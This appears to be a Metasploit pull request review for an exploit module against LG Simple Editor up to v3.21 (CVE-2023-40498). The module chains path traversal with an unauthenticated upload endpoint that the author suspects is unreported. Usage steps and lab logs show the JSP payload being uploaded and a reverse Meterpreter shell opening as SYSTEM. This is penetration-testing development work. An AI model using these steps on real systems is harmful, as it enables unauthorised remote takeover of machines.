Add LG Simple Editor Unauthenticated RCE (CVE-2023-40498) Exploit

[EgeBalci]

Hello 👋

This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution via uploading and executing a JSP payload.

Testing

For installing the vulnerable version follow the steps below,

1. Download the installation file of the vulnerable software here
2. Follow the installation steps.

After these steps, the LG Simple Editor service should be accessible on port 8080.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/http/lg_simple_editor_rce
• Do set rhost [IP]
• Do check

[jheysel-r7]

Thanks for the module @EgeBalci, looks great, testing was as expected.

Just a couple last minute comments about the metadata.

msf6 > use lg_simple
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/windows/http/lg_simple_editor_rce  2023-08-24       excellent  Yes    LG Simple Editor Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/lg_simple_editor_rce

[*] Using exploit/windows/http/lg_simple_editor_rce
msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/lg_simple_editor_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Uploading JSP payload...
[+] Payload uploaded successfully
[+] /XasNt_original.bmp -> /XasNt.jsp copy successfull.
[*] Triggering payload...
[*] Sending stage (175686 bytes) to 172.16.199.131
[+] Deleted ./webapps/simpleeditor/XasNt.jsp
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:51845) at 2023-09-05 18:05:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-8ATHH6O
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

[jheysel-r7]

I saw the ZDI advisory/ the references listed below only mention one CVE but here you're mentioning the module exploits multiple vulnerabilities. Should there be another CVE listed in the references? Just curious.

Suggested change

	The vulnerabilities exists in versions of LG Simple Editor prior to v3.21.
	The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.

[EgeBalci]

Yes, module exploit two vulns, but directory traversal is the only one reported to ZDI. The second vuln is broken access control because the uploadImage.do endpoint does not require authentication. I discovered the second vulnerability while trying to exploit the first one. I couldn't find any CVE or related publication; It might be a 0day.

[jheysel-r7]

Cool, after a quick search I couldn't find anything related to the second vuln either. There were 25 CVEs disclosed in the security bulletin and ZDI specified that the path traversal is exploitable without authentication. I say we land this as is for now, however when more info comes out if this does turn out to be an 0day we can help get you a CVE assigned.

[jheysel-r7]

Thanks @EgeBalci, great module, testing was as expected:

msf6 exploit(windows/http/lg_simple_editor_rce) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(windows/http/lg_simple_editor_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/http/lg_simple_editor_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 3.21.0
[*] Uploading JSP payload...
[+] Payload uploaded successfully
[+] /thWIS_original.bmp -> /thWIS.jsp copy successfull.
[*] Triggering payload...
[*] Sending stage (175686 bytes) to 172.16.199.131
[+] Deleted ./webapps/simpleeditor/thWIS.jsp
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:62426) at 2023-09-07 16:14:40 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-8ATHH6O
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

[jheysel-r7]

Release Notes

This module exploits broken access control and directory traversal vulnerabilities for achieving unauthenticated remote code execution on the LG Simple Editor versions <= v3.21. Module achieves code execution in the context of NT AUTHORITY\SYSTEM via uploading and executing a JSP payload.